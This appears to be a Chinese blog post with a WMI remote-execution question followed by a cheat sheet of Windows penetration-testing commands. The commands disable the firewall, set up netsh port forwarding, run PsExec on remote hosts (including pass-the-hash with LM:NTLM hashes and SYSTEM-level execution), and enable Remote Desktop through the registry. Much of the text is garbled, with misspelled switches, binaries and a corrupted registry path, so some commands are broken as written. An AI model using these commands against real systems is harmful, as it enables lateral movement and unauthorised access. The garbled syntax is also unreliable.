python调用wmi库查询进度实践命令重回值,windows境况渗透中常用系统命令

c=wmi.WMI()cmd=r”netstatisticsWORKSTATION”value=c.Win32_Process.Create(CommandLine=cmd)大家好,请问我已经执行了命令了,怎么获取得命令执行结果?本地方法比较多我知道,如果是远程服务器的话,如何使用wmi获取到命令的执行结果

禁用windows防火墙
netsh advfirewall set currentprofile state off
netsh adbfirewall set all profiles state off

本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发
启用转发
netsh interface port proxy add v4tov4 listenport=3000
listenaddress=192.168.1.100 connectport=4000
connectaddress=192.168.1.120
停止转发
netsh interface portproxy delete v4tov4 listenport=3000
listenaddress=192.168.1.100

psexec的一些用法

执行远程主机上上的文件或者命令
psexec /acceptula targetip -u domainuser -p password -c -f smbip
sharefile.exe

#注意,第一次执行psexec一定要带aaceptula参数,否则会弹出一个确认对话框,在命令行下是没办法结束的

利用用户hash来登录远程主机并执行命令
psexec /acceptula ip -u Domainuser -p LM:NTLM cmd.exe /c dir c:

以system权限来执行远程命令
psexec /accepteula ip -s md.exe

修改注册表开启windows终端服务
reg add “HKEY LOCAL
t1ACHINESYSTEHCurentControlSetControlTerminal Server” /v
fDenyTSConnections /t REG_DWORD /d 0 /f

发表评论

电子邮件地址不会被公开。 必填项已用*标注